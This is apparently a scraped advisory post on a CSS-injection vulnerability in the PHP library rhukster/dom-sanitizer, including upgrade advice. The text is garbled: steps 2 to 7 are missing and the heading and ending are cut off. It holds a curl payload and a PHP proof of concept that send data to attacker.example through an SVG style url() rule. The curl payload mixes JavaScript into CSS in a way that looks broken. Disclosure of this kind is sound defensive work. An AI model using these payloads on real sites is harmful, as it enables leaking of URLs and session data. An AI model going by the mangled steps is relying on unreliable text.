Listen to this Post
How CVE-2026-40301 Works
- The vulnerability exists in `DOMSanitizer::sanitize()` because the function allows `
`
8. When an application renders the sanitized output in a browser, the browser processes the CSS rule.
9. The browser issues a GET request to the attacker‑controlled host, leaking the page URL and other sensitive information.
10. In some browsers, the attacker can combine CSS attribute selectors with `url()` to exfiltrate cookie or session token values.
11. The vulnerability was confirmed exploitable in Statamic CMS (GHSA‑g8hv‑8w5p‑cvqg).dailycve Form
Platform: PHP library
Version: < 1.0.10
Vulnerability : CSS injection
Severity: Moderate
date: 2026‑04‑10Prediction: Already patched
What Undercode Say
Analytics – check for vulnerable versions composer show rhukster/dom-sanitizer | grep versions Test payload that leaks the page URL curl -X POST https://target.com/upload \ -F "svg=@<(echo '<svg xmlns=\"http://www.w3.org/2000/svg\"><style> { background: url(https://attacker.example/collect?url='+encodeURIComponent(window.location)+'); }</style></svg>')"Exploit
<?php require 'vendor/autoload.php'; use Rhukster\DomSanitizer\DOMSanitizer; $svg = '<svg xmlns="http://www.w3.org/2000/svg"> <style> { background: url(https://attacker.example/collect); } </style> </svg>'; $sanitizer = new DOMSanitizer(DOMSanitizer::SVG); $output = $sanitizer->sanitize($svg); echo $output; // The <style> block with url() survives unchanged ?>Protection from this CVE
- Upgrade to rhukster/dom-sanitizer ≥ 1.0.10.
- If immediate upgrade is impossible, remove `'style'` from the SVG allowed‑tag array (line 31) and manually strip `
